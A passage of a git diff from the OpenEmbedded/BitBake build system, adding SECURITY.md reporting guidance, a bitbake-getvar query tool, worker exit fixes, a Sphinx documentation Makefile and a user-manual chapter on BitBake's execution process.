2122 files changed, 186622 insertions, 116904 deletions

diff --git a/README.OE-Core b/README.OE-Core
index 521916cd4f..2f2127fb03 100644
--- a/README.OE-Core
+++ b/README.OE-Core
@@ -6,24 +6,24 @@ of OpenEmbedded. It is distro-less (can build a functional image with
 DISTRO = "nodistro") and contains only emulated machine support.
 
 For information about OpenEmbedded, see the OpenEmbedded website:
-    http://www.openembedded.org/
+    https://www.openembedded.org/
 
 The Yocto Project has extensive documentation about OE including a reference manual
 which can be found at:
-    http://yoctoproject.org/documentation
+    https://docs.yoctoproject.org/
 
 
 Contributing
 ------------
 
 Please refer to
-http://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
+https://www.openembedded.org/wiki/How_to_submit_a_patch_to_OpenEmbedded
 for guidelines on how to submit patches.
 
 Mailing list:
 
-    http://lists.openembedded.org/mailman/listinfo/openembedded-core
+    https://lists.openembedded.org/g/openembedded-core
 
 Source code:
 
-    http://git.openembedded.org/openembedded-core/
+    https://git.openembedded.org/openembedded-core/
diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 0000000000..7d2ce1f631
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,24 @@
+How to Report a Potential Vulnerability?
+========================================
+
+If you would like to report a public issue (for example, one with a released
+CVE number), please report it using the
+[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
+If you have a patch ready, submit it following the same procedure as any other
+patch as described in README.md.
+
+If you are dealing with a not-yet released or urgent issue, please send a
+message to security AT yoctoproject DOT org, including as many details as
+possible: the layer or software module affected, the recipe and its version,
+and any example code, if available.
+
+Branches maintained with security fixes
+---------------------------------------
+
+See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
+for detailed info regarding the policies and maintenance of Stable branches.
+
+The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
+releases of the Yocto Project. Versions in grey are no longer actively maintained with
+security patches, but well-tested patches may still be accepted for them for
+significant issues.
diff --git a/bitbake/SECURITY.md b/bitbake/SECURITY.md
new file mode 100644
index 0000000000..7d2ce1f631
--- /dev/null
+++ b/bitbake/SECURITY.md
@@ -0,0 +1,24 @@
+How to Report a Potential Vulnerability?
+========================================
+
+If you would like to report a public issue (for example, one with a released
+CVE number), please report it using the
+[https://bugzilla.yoctoproject.org/enter_bug.cgi?product=Security Security Bugzilla].
+If you have a patch ready, submit it following the same procedure as any other
+patch as described in README.md.
+
+If you are dealing with a not-yet released or urgent issue, please send a
+message to security AT yoctoproject DOT org, including as many details as
+possible: the layer or software module affected, the recipe and its version,
+and any example code, if available.
+
+Branches maintained with security fixes
+---------------------------------------
+
+See [https://wiki.yoctoproject.org/wiki/Stable_Release_and_LTS Stable release and LTS]
+for detailed info regarding the policies and maintenance of Stable branches.
+
+The [https://wiki.yoctoproject.org/wiki/Releases Release page] contains a list of all
+releases of the Yocto Project. Versions in grey are no longer actively maintained with
+security patches, but well-tested patches may still be accepted for them for
+significant issues.
diff --git a/bitbake/bin/bitbake-getvar b/bitbake/bin/bitbake-getvar
new file mode 100755
index 0000000000..9423219253
--- /dev/null
+++ b/bitbake/bin/bitbake-getvar
@@ -0,0 +1,48 @@
+#! /usr/bin/env python3
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import argparse
+import io
+import os
+import sys
+
+bindir = os.path.dirname(__file__)
+topdir = os.path.dirname(bindir)
+sys.path[0:0] = [os.path.join(topdir, 'lib')]
+
+import bb.tinfoil
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Bitbake Query Variable")
+    parser.add_argument("variable", help="variable name to query")
+    parser.add_argument("-r", "--recipe", help="Recipe name to query", default=None, required=False)
+    parser.add_argument('-u', '--unexpand', help='Do not expand the value (with --value)', action="store_true")
+    parser.add_argument('-f', '--flag', help='Specify a variable flag to query (with --value)', default=None)
+    parser.add_argument('--value', help='Only report the value, no history and no variable name', action="store_true")
+    args = parser.parse_args()
+
+    if args.unexpand and not args.value:
+        print("--unexpand only makes sense with --value")
+        sys.exit(1)
+
+    if args.flag and not args.value:
+        print("--flag only makes sense with --value")
+        sys.exit(1)
+
+    with bb.tinfoil.Tinfoil(tracking=True) as tinfoil:
+        if args.recipe:
+            tinfoil.prepare(quiet=2)
+            d = tinfoil.parse_recipe(args.recipe)
+        else:
+            tinfoil.prepare(quiet=2, config_only=True)
+            d = tinfoil.config_data
+        if args.flag:
+            print(str(d.getVarFlag(args.variable, args.flag, expand=(not args.unexpand))))
+        elif args.value:
+            print(str(d.getVar(args.variable, expand=(not args.unexpand))))
+        else:
+            bb.data.emit_var(args.variable, d=d, all=True)
diff --git a/bitbake/bin/bitbake-worker b/bitbake/bin/bitbake-worker
index 97cc0fd60f..e3ce01eec8 100755
--- a/bitbake/bin/bitbake-worker
+++ b/bitbake/bin/bitbake-worker
@@ -413,9 +413,9 @@ class BitbakeWorker(object):
 
     def handle_workerdata(self, data):
         self.workerdata = pickle.loads(data)
+        bb.build.verboseShellLogging = self.workerdata["build_verbose_shell"]
+        bb.build.verboseStdoutLogging = self.workerdata["build_verbose_stdout"]
         bb.msg.loggerDefaultLogLevel = self.workerdata["logdefaultlevel"]
-        bb.msg.loggerDefaultVerbose = self.workerdata["logdefaultverbose"]
-        bb.msg.loggerVerboseLogs = self.workerdata["logdefaultverboselogs"]
         bb.msg.loggerDefaultDomains = self.workerdata["logdefaultdomain"]
         for mc in self.databuilder.mcdata:
             self.databuilder.mcdata[mc].setVar("PRSERV_HOST", self.workerdata["prhost"])
@@ -505,9 +505,11 @@ except BaseException as e:
         import traceback
         sys.stderr.write(traceback.format_exc())
         sys.stderr.write(str(e))
+finally:
+    worker_thread_exit = True
+    worker_thread.join()
 
-worker_thread_exit = True
-worker_thread.join()
-
-workerlog_write("exitting")
+workerlog_write("exiting")
+if not normalexit:
+    sys.exit(1)
 sys.exit(0)
diff --git a/bitbake/doc/.gitignore b/bitbake/doc/.gitignore
new file mode 100644
index 0000000000..69fa449dd9
--- /dev/null
+++ b/bitbake/doc/.gitignore
@@ -0,0 +1 @@
+_build/
diff --git a/bitbake/doc/Makefile b/bitbake/doc/Makefile
index 3c28f4b222..4d721d30f3 100644
--- a/bitbake/doc/Makefile
+++ b/bitbake/doc/Makefile
@@ -1,91 +1,35 @@
-# This is a single Makefile to handle all generated BitBake documents.
-# The Makefile needs to live in the documentation directory and all figures used
-# in any manuals must be .PNG files and live in the individual book's figures
-# directory.
-#
-# The Makefile has these targets:
-#
-#    pdf:      generates a PDF version of a manual.
-#    html:     generates an HTML version of a manual.
-#    tarball:  creates a tarball for the doc files.
-#    validate: validates
-#    clean:    removes files
-#
-# The Makefile generates an HTML version of every document.  The
-# variable DOC indicates the folder name for a given manual.
-#
-# To build a manual, you must invoke 'make' with the DOC argument.
-#
-# Examples:
-#
-#     make DOC=bitbake-user-manual
-#     make pdf DOC=bitbake-user-manual
-#
-# The first example generates the HTML version of the User Manual.
-# The second example generates the PDF version of the User Manual.
+# Minimal makefile for Sphinx documentation
 #
 
-ifeq ($(DOC),bitbake-user-manual)
-XSLTOPTS = --stringparam html.stylesheet bitbake-user-manual-style.css \
-           --stringparam  chapter.autolabel 1 \
-           --stringparam  section.autolabel 1 \
-           --stringparam  section.label.includes.component.label 1 \
-           --xinclude
-ALLPREQ = html tarball
-TARFILES = bitbake-user-manual-style.css bitbake-user-manual.html figures/bitbake-title.png
-MANUALS = $(DOC)/$(DOC).html
-FIGURES = figures
-STYLESHEET = $(DOC)/*.css
+# You can set these variables from the command line, and also
+# from the environment for the first two.
+SPHINXOPTS    ?=
+SPHINXBUILD   ?= sphinx-build
+SOURCEDIR     = .
+BUILDDIR      = _build
+DESTDIR       = final
 
+ifeq ($(shell if which $(SPHINXBUILD) >/dev/null 2>&1; then echo 1; else echo 0; fi),0)
+$(error "The '$(SPHINXBUILD)' command was not found. Make sure you have Sphinx installed")
 endif
 
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your localy installed XSL stylesheets.
-XSL_BASE_URI  = http://docbook.sourceforge.net/release/xsl/current
-XSL_XHTML_URI = $(XSL_BASE_URI)/xhtml/docbook.xsl
+# Put it first so that "make" without argument is like "make help".
+help:
+	@$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
 
-all: $(ALLPREQ)
+.PHONY: help Makefile clean publish
 
-pdf:
-ifeq ($(DOC),bitbake-user-manual)
-	@echo " "
-	@echo "********** Building."$(DOC)
-	@echo " "
-	cd $(DOC); ../tools/docbook-to-pdf $(DOC).xml ../template; cd ..
-endif
-
-html:
-ifeq ($(DOC),bitbake-user-manual)
-#       See http://www.sagehill.net/docbookxsl/HtmlOutput.html
-	@echo " "
-	@echo "******** Building "$(DOC)
-	@echo " "
-	cd $(DOC); xsltproc $(XSLTOPTS) -o $(DOC).html $(DOC)-customization.xsl $(DOC).xml; cd ..
-endif
-
-tarball: html
-	@echo " "
-	@echo "******** Creating Tarball of document files"
-	@echo " "
-	cd $(DOC); tar -cvzf $(DOC).tgz $(TARFILES); cd ..
-
-validate:
-	cd $(DOC); xmllint --postvalid --xinclude --noout $(DOC).xml; cd ..
-
-publish:
-	@if test -f $(DOC)/$(DOC).html; \
-	  then \
-            echo " "; \
-            echo "******** Publishing "$(DOC)".html"; \
-            echo " "; \
-            scp -r $(MANUALS) $(STYLESHEET) docs.yp:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
-            cd $(DOC); scp -r $(FIGURES) docs.yp:/var/www/www.yoctoproject.org-docs/$(VER)/$(DOC); \
-	else \
-          echo " "; \
-          echo $(DOC)".html missing.  Generate the file first then try again."; \
-          echo " "; \
-	fi
+publish: Makefile html singlehtml
+	rm -rf $(BUILDDIR)/$(DESTDIR)/
+	mkdir -p $(BUILDDIR)/$(DESTDIR)/
+	cp -r $(BUILDDIR)/html/* $(BUILDDIR)/$(DESTDIR)/
+	cp $(BUILDDIR)/singlehtml/index.html $(BUILDDIR)/$(DESTDIR)/singleindex.html
+	sed -i -e 's@index.html#@singleindex.html#@g' $(BUILDDIR)/$(DESTDIR)/singleindex.html
 
 clean:
-	rm -rf $(MANUALS); rm $(DOC)/$(DOC).tgz;
+	@rm -rf $(BUILDDIR)
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option.  $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+	@$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
diff --git a/bitbake/doc/README b/bitbake/doc/README
index 303cf8eec7..cbb5215d30 100644
--- a/bitbake/doc/README
+++ b/bitbake/doc/README
@@ -15,25 +15,41 @@ Each folder is self-contained regarding content and figures.
 If you want to find HTML versions of the BitBake manuals on the web, 
 go to http://www.openembedded.org/wiki/Documentation. 
 
-Makefile
-========
+Sphinx
+======
 
-The Makefile processes manual directories to create HTML, PDF,
-tarballs, etc.  Details on how the Makefile work are documented
-inside the Makefile.  See that file for more information.
+The BitBake documentation was migrated from the original DocBook
+format to Sphinx based documentation for the Yocto Project 3.2
+release.
 
-To build a manual, you run the make command and pass it the name
-of the folder containing the manual's contents. 
-For example, the following command run from the documentation directory 
-creates an HTML and a PDF version of the BitBake User Manual.
-The DOC variable specifies the manual you are making:
+Additional information related to the Sphinx migration, and guidelines
+for developers willing to contribute to the BitBake documentation can
+be found in the Yocto Project Documentation README file:
 
-     $ make DOC=bitbake-user-manual
+https://git.yoctoproject.org/cgit/cgit.cgi/yocto-docs/tree/documentation/README
 
-template
-========
-Contains various templates, fonts, and some old PNG files.
+How to build the Yocto Project documentation
+============================================
 
-tools
-=====
-Contains a tool to convert the DocBook files to PDF format.
+Sphinx is written in Python. While it might work with Python2, for
+obvious reasons, we will only support building the BitBake
+documentation with Python3.
+
+Sphinx might be available in your Linux distro packages repositories,
+however it is not recommend using distro packages, as they might be
+old versions, especially if you are using an LTS version of your
+distro. The recommended method to install Sphinx and all required
+dependencies is to use the Python Package Index (pip).
+
+To install all required packages run:
+
+ $ pip3 install sphinx sphinx_rtd_theme pyyaml
+
+To build the documentation locally, run:
+
+ $ cd documentation
+ $ make html
+
+The resulting HTML index page will be _build/html/index.html, and you
+can browse your own copy of the locally generated documentation with
+your browser.
diff --git a/bitbake/doc/_templates/breadcrumbs.html b/bitbake/doc/_templates/breadcrumbs.html
new file mode 100644
index 0000000000..eb6244b74c
--- /dev/null
+++ b/bitbake/doc/_templates/breadcrumbs.html
@@ -0,0 +1,14 @@
+{% extends "!breadcrumbs.html" %}
+
+{% block breadcrumbs %}
+    <li>
+      <span class="doctype_switcher_placeholder">{{ doctype or 'single' }}</span>
+      <span class="version_switcher_placeholder">{{ release }}</span>
+    </li>
+    <li> &raquo;</li>
+    {% for doc in parents %}
+      <li><a href="{{ doc.link|e }}">{{ doc.title }}</a> &raquo;</li>
+    {% endfor %}
+    <li>{{ title }}</li>
+{% endblock %}
+
diff --git a/bitbake/doc/_templates/layout.html b/bitbake/doc/_templates/layout.html
new file mode 100644
index 0000000000..308d5c7a28
--- /dev/null
+++ b/bitbake/doc/_templates/layout.html
@@ -0,0 +1,7 @@
+{% extends "!layout.html" %}
+
+{% block extrabody %}
+<div id="outdated-warning" style="text-align: center; background-color: #FFBABA; color: #6A0E0E;">
+</div>
+{% endblock %}
+
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl
deleted file mode 100644
index 5985ea783f..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-customization.xsl
+++ /dev/null
@@ -1,29 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-  <xsl:include href="../template/gloss-permalinks.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'user-manual-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="appendix.autolabel">A</xsl:param>
-
-<!--  <xsl:param name="generate.toc" select="'article nop'"></xsl:param>  -->
-
-</xsl:stylesheet>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst
new file mode 100644
index 0000000000..a2fee4ec93
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-execution.rst
@@ -0,0 +1,733 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+=========
+Execution
+=========
+
+|
+
+The primary purpose for running BitBake is to produce some kind of
+output such as a single installable package, a kernel, a software
+development kit, or even a full, board-specific bootable Linux image,
+complete with bootloader, kernel, and root filesystem. Of course, you
+can execute the ``bitbake`` command with options that cause it to
+execute single tasks, compile single recipe files, capture or clear
+data, or simply return information about the execution environment.
+
+This chapter describes BitBake's execution process from start to finish
+when you use it to create an image. The execution process is launched
+using the following command form: ::
+
+  $ bitbake target
+
+For information on
+the BitBake command and its options, see ":ref:`The BitBake Command
+<bitbake-user-manual-command>`" section.
+
+.. note::
+
+   Prior to executing BitBake, you should take advantage of available
+   parallel thread execution on your build host by setting the
+   :term:`BB_NUMBER_THREADS` variable in
+   your project's ``local.conf`` configuration file.
+
+   A common method to determine this value for your build host is to run
+   the following: ::
+
+     $ grep processor /proc/cpuinfo
+
+   This command returns
+   the number of processors, which takes into account hyper-threading.
+   Thus, a quad-core build host with hyper-threading most likely shows
+   eight processors, which is the value you would then assign to
+   ``BB_NUMBER_THREADS``.
+
+   A possibly simpler solution is that some Linux distributions (e.g.
+   Debian and Ubuntu) provide the ``ncpus`` command.
+
+Parsing the Base Configuration Metadata
+=======================================
+
+The first thing BitBake does is parse base configuration metadata. Base
+configuration metadata consists of your project's ``bblayers.conf`` file
+to determine what layers BitBake needs to recognize, all necessary
+``layer.conf`` files (one from each layer), and ``bitbake.conf``. The
+data itself is of various types:
+
+-  **Recipes:** Details about particular pieces of software.
+
+-  **Class Data:** An abstraction of common build information (e.g. how to
+   build a Linux kernel).
+
+-  **Configuration Data:** Machine-specific settings, policy decisions,
+   and so forth. Configuration data acts as the glue to bind everything
+   together.
+
+The ``layer.conf`` files are used to construct key variables such as
+:term:`BBPATH` and :term:`BBFILES`.
+``BBPATH`` is used to search for configuration and class files under the
+``conf`` and ``classes`` directories, respectively. ``BBFILES`` is used
+to locate both recipe and recipe append files (``.bb`` and
+``.bbappend``). If there is no ``bblayers.conf`` file, it is assumed the
+user has set the ``BBPATH`` and ``BBFILES`` directly in the environment.
+
+Next, the ``bitbake.conf`` file is located using the ``BBPATH`` variable
+that was just constructed. The ``bitbake.conf`` file may also include
+other configuration files using the ``include`` or ``require``
+directives.
+
+Prior to parsing configuration files, BitBake looks at certain
+variables, including:
+
+-  :term:`BB_ENV_WHITELIST`
+-  :term:`BB_ENV_EXTRAWHITE`
+-  :term:`BB_PRESERVE_ENV`
+-  :term:`BB_ORIGENV`
+-  :term:`BITBAKE_UI`
+
+The first four variables in this list relate to how BitBake treats shell
+environment variables during task execution. By default, BitBake cleans
+the environment variables and provides tight control over the shell
+execution environment. However, through the use of these first four
+variables, you can apply your control regarding the environment
+variables allowed to be used by BitBake in the shell during execution of
+tasks. See the
+":ref:`bitbake-user-manual/bitbake-user-manual-metadata:Passing Information Into the Build Task Environment`"
+section and the information about these variables in the variable
+glossary for more information on how they work and on how to use them.
+
+The base configuration metadata is global and therefore affects all
+recipes and tasks that are executed.
+
+BitBake first searches the current working directory for an optional
+``conf/bblayers.conf`` configuration file. This file is expected to
+contain a :term:`BBLAYERS` variable that is a
+space-delimited list of 'layer' directories. Recall that if BitBake
+cannot find a ``bblayers.conf`` file, then it is assumed the user has
+set the ``BBPATH`` and ``BBFILES`` variables directly in the
+environment.
+
+For each directory (layer) in this list, a ``conf/layer.conf`` file is
+located and parsed with the :term:`LAYERDIR` variable
+being set to the directory where the layer was found. The idea is these
+files automatically set up :term:`BBPATH` and other
+variables correctly for a given build directory.
+
+BitBake then expects to find the ``conf/bitbake.conf`` file somewhere in
+the user-specified ``BBPATH``. That configuration file generally has
+include directives to pull in any other metadata such as files specific
+to the architecture, the machine, the local environment, and so forth.
+
+Only variable definitions and include directives are allowed in BitBake
+``.conf`` files. Some variables directly influence BitBake's behavior.
+These variables might have been set from the environment depending on
+the environment variables previously mentioned or set in the
+configuration files. The ":ref:`bitbake-user-manual/bitbake-user-manual-ref-variables:Variables Glossary`"
+chapter presents a full list of
+variables.
+
+After parsing configuration files, BitBake uses its rudimentary
+inheritance mechanism, which is through class files, to inherit some
+standard classes. BitBake parses a class when the inherit directive
+responsible for getting that class is encountered.
+
+The ``base.bbclass`` file is always included. Other classes that are
+specified in the configuration using the
+:term:`INHERIT` variable are also included. BitBake
+searches for class files in a ``classes`` subdirectory under the paths
+in ``BBPATH`` in the same way as configuration files.
+
+A good way to get an idea of the configuration files and the class files
+used in your execution environment is to run the following BitBake
+command: ::
+
+  $ bitbake -e > mybb.log
+
+Examining the top of the ``mybb.log``
+shows you the many configuration files and class files used in your
+execution environment.
+
+.. note::
+
+   You need to be aware of how BitBake parses curly braces. If a recipe
+   uses a closing curly brace within the function and the character has
+   no leading spaces, BitBake produces a parsing error. If you use a
+   pair of curly braces in a shell function, the closing curly brace
+   must not be located at the start of the line without leading spaces.
+
+   Here is an example that causes BitBake to produce a parsing error: ::
+
+      fakeroot create_shar() {
+         cat << "EOF" > ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
+      usage()
+      {
+         echo "test"
+         ######  The following "}" at the start of the line causes a parsing error ######
+      }
+      EOF
+      }
+
+      Writing the recipe this way avoids the error:
+      fakeroot create_shar() {
+         cat << "EOF" > ${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.sh
+      usage()
+      {
+         echo "test"
+         ###### The following "}" with a leading space at the start of the line avoids the error ######
+       }
+      EOF
+      }
+
+Locating and Parsing Recipes
+============================
+
+During the configuration phase, BitBake will have set
+:term:`BBFILES`. BitBake now uses it to construct a
+list of recipes to parse, along with any append files (``.bbappend``) to
+apply. ``BBFILES`` is a space-separated list of available files and
+supports wildcards. An example would be: ::
+
+  BBFILES = "/path/to/bbfiles/*.bb /path/to/appends/*.bbappend"
+
+BitBake parses each
+recipe and append file located with ``BBFILES`` and stores the values of
+various variables into the datastore.
+
+.. note::
+
+   Append files are applied in the order they are encountered in BBFILES.
+
+For each file, a fresh copy of the base configuration is made, then the
+recipe is parsed line by line. Any inherit statements cause BitBake to
+find and then parse class files (``.bbclass``) using
+:term:`BBPATH` as the search path. Finally, BitBake
+parses in order any append files found in ``BBFILES``.
+
+One common convention is to use the recipe filename to define pieces of
+metadata. For example, in ``bitbake.conf`` the recipe name and version
+are used to set the variables :term:`PN` and
+:term:`PV`: ::
+
+   PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
+   PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
+
+In this example, a recipe called "something_1.2.3.bb" would set
+``PN`` to "something" and ``PV`` to "1.2.3".
+
+By the time parsing is complete for a recipe, BitBake has a list of
+tasks that the recipe defines and a set of data consisting of keys and
+values as well as dependency information about the tasks.
+
+BitBake does not need all of this information. It only needs a small
+subset of the information to make decisions about the recipe.
+Consequently, BitBake caches the values in which it is interested and
+does not store the rest of the information. Experience has shown it is
+faster to re-parse the metadata than to try and write it out to the disk
+and then reload it.
+
+Where possible, subsequent BitBake commands reuse this cache of recipe
+information. The validity of this cache is determined by first computing
+a checksum of the base configuration data (see
+:term:`BB_HASHCONFIG_WHITELIST`) and
+then checking if the checksum matches. If that checksum matches what is
+in the cache and the recipe and class files have not changed, BitBake is
+able to use the cache. BitBake then reloads the cached information about
+the recipe instead of reparsing it from scratch.
+
+Recipe file collections exist to allow the user to have multiple
+repositories of ``.bb`` files that contain the same exact package. For
+example, one could easily use them to make one's own local copy of an
+upstream repository, but with custom modifications that one does not
+want upstream. Here is an example: ::
+
+  BBFILES = "/stuff/openembedded/*/*.bb /stuff/openembedded.modified/*/*.bb"
+  BBFILE_COLLECTIONS = "upstream local"
+  BBFILE_PATTERN_upstream = "^/stuff/openembedded/"
+  BBFILE_PATTERN_local = "^/stuff/openembedded.modified/"
+  BBFILE_PRIORITY_upstream = "5" BBFILE_PRIORITY_local = "10"
+
+.. note::
+
+   The layers mechanism is now the preferred method of collecting code.
+   While the collections code remains, its main use is to set layer
+   priorities and to deal with overlap (conflicts) between layers.
+
+.. _bb-bitbake-providers:
+
+Providers
+=========
+
+Assuming BitBake has been instructed to execute a target and that all
+the recipe files have been parsed, BitBake starts to figure out how to
+build the target. BitBake looks through the ``PROVIDES`` list for each
+of the recipes. A ``PROVIDES`` list is the list of names by which the
+recipe can be known. Each recipe's ``PROVIDES`` list is created
+implicitly through the recipe's :term:`PN` variable and
+explicitly through the recipe's :term:`PROVIDES`
+variable, which is optional.
+
+When a recipe uses ``PROVIDES``, that recipe's functionality can be
+found under an alternative name or names other than the implicit ``PN``
+name. As an example, suppose a recipe named ``keyboard_1.0.bb``
+contained the following: ::
+
+  PROVIDES += "fullkeyboard"
+
+The ``PROVIDES``
+list for this recipe becomes "keyboard", which is implicit, and
+"fullkeyboard", which is explicit. Consequently, the functionality found
+in ``keyboard_1.0.bb`` can be found under two different names.
+
+.. _bb-bitbake-preferences:
+
+Preferences
+===========
+
+The ``PROVIDES`` list is only part of the solution for figuring out a
+target's recipes. Because targets might have multiple providers, BitBake
+needs to prioritize providers by determining provider preferences.
+
+A common example in which a target has multiple providers is
+"virtual/kernel", which is on the ``PROVIDES`` list for each kernel
+recipe. Each machine often selects the best kernel provider by using a
+line similar to the following in the machine configuration file: ::
+
+  PREFERRED_PROVIDER_virtual/kernel = "linux-yocto"
+
+The default :term:`PREFERRED_PROVIDER` is the provider
+with the same name as the target. BitBake iterates through each target
+it needs to build and resolves them and their dependencies using this
+process.
+
+Understanding how providers are chosen is made complicated by the fact
+that multiple versions might exist for a given provider. BitBake
+defaults to the highest version of a provider. Version comparisons are
+made using the same method as Debian. You can use the
+:term:`PREFERRED_VERSION` variable to
+specify a particular version. You can influence the order by using the
+:term:`DEFAULT_PREFERENCE` variable.
+
+By default, files have a preference of "0". Setting
+``DEFAULT_PREFERENCE`` to "-1" makes the recipe unlikely to be used
+unless it is explicitly referenced. Setting ``DEFAULT_PREFERENCE`` to
+"1" makes it likely the recipe is used. ``PREFERRED_VERSION`` overrides
+any ``DEFAULT_PREFERENCE`` setting. ``DEFAULT_PREFERENCE`` is often used
+to mark newer and more experimental recipe versions until they have
+undergone sufficient testing to be considered stable.
+
+When there are multiple "versions" of a given recipe, BitBake defaults
+to selecting the most recent version, unless otherwise specified. If the
+recipe in question has a
+:term:`DEFAULT_PREFERENCE` set lower than
+the other recipes (default is 0), then it will not be selected. This
+allows the person or persons maintaining the repository of recipe files
+to specify their preference for the default selected version.
+Additionally, the user can specify their preferred version.
+
+If the first recipe is named ``a_1.1.bb``, then the
+:term:`PN` variable will be set to "a", and the
+:term:`PV` variable will be set to 1.1.
+
+Thus, if a recipe named ``a_1.2.bb`` exists, BitBake will choose 1.2 by
+default. However, if you define the following variable in a ``.conf``
+file that BitBake parses, you can change that preference: ::
+
+  PREFERRED_VERSION_a = "1.1"
+
+.. note::
+
+   It is common for a recipe to provide two versions -- a stable,
+   numbered (and preferred) version, and a version that is automatically
+   checked out from a source code repository that is considered more
+   "bleeding edge" but can be selected only explicitly.
+
+   For example, in the OpenEmbedded codebase, there is a standard,
+   versioned recipe file for BusyBox, ``busybox_1.22.1.bb``, but there
+   is also a Git-based version, ``busybox_git.bb``, which explicitly
+   contains the line ::
+
+     DEFAULT_PREFERENCE = "-1"
+
+   to ensure that the
+   numbered, stable version is always preferred unless the developer
+   selects otherwise.
+
+.. _bb-bitbake-dependencies:
+
+Dependencies
+============
+
+Each target BitBake builds consists of multiple tasks such as ``fetch``,
+``unpack``, ``patch``, ``configure``, and ``compile``. For best
+performance on multi-core systems, BitBake considers each task as an
+independent entity with its own set of dependencies.
+
+Dependencies are defined through several variables. You can find
+information about variables BitBake uses in the
+:doc:`bitbake-user-manual-ref-variables` near the end of this manual. At a
+basic level, it is sufficient to know that BitBake uses the
+:term:`DEPENDS` and
+:term:`RDEPENDS` variables when calculating
+dependencies.
+
+For more information on how BitBake handles dependencies, see the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:Dependencies`
+section.
+
+.. _ref-bitbake-tasklist:
+
+The Task List
+=============
+
+Based on the generated list of providers and the dependency information,
+BitBake can now calculate exactly what tasks it needs to run and in what
+order it needs to run them. The
+:ref:`bitbake-user-manual/bitbake-user-manual-execution:executing tasks`
+section has more information on how BitBake chooses which task to
+execute next.
+
+The build now starts with BitBake forking off threads up to the limit
+set in the :term:`BB_NUMBER_THREADS`
+variable. BitBake continues to fork threads as long as there are tasks
+ready to run, those tasks have all their dependencies met, and the
+thread threshold has not been exceeded.
+
+It is worth noting that you can greatly speed up the build time by
+properly setting the ``BB_NUMBER_THREADS`` variable.
+
+As each task completes, a timestamp is written to the directory
+specified by the :term:`STAMP` variable. On subsequent
+runs, BitBake looks in the build directory within ``tmp/stamps`` and
+does not rerun tasks that are already completed unless a timestamp is
+found to be invalid. Currently, invalid timestamps are only considered
+on a per recipe file basis. So, for example, if the configure stamp has
+a timestamp greater than the compile timestamp for a given target, then
+the compile task would rerun. Running the compile task again, however,
+has no effect on other providers that depend on that target.
+
+The exact format of the stamps is partly configurable. In modern
+versions of BitBake, a hash is appended to the stamp so that if the
+configuration changes, the stamp becomes invalid and the task is
+automatically rerun. This hash, or signature used, is governed by the
+signature policy that is configured (see the
+:ref:`bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)`
+section for information). It is also
+possible to append extra metadata to the stamp using the
+``[stamp-extra-info]`` task flag. For example, OpenEmbedded uses this
+flag to make some tasks machine-specific.
+
+.. note::
+
+   Some tasks are marked as "nostamp" tasks. No timestamp file is
+   created when these tasks are run. Consequently, "nostamp" tasks are
+   always rerun.
+
+For more information on tasks, see the
+:ref:`bitbake-user-manual/bitbake-user-manual-metadata:tasks` section.
+
+Executing Tasks
+===============
+
+Tasks can be either a shell task or a Python task. For shell tasks,
+BitBake writes a shell script to
+``${``\ :term:`T`\ ``}/run.do_taskname.pid`` and then
+executes the script. The generated shell script contains all the
+exported variables, and the shell functions with all variables expanded.
+Output from the shell script goes to the file
+``${T}/log.do_taskname.pid``. Looking at the expanded shell functions in
+the run file and the output in the log files is a useful debugging
+technique.
+
+For Python tasks, BitBake executes the task internally and logs
+information to the controlling terminal. Future versions of BitBake will
+write the functions to files similar to the way shell tasks are handled.
+Logging will be handled in a way similar to shell tasks as well.
+
+The order in which BitBake runs the tasks is controlled by its task
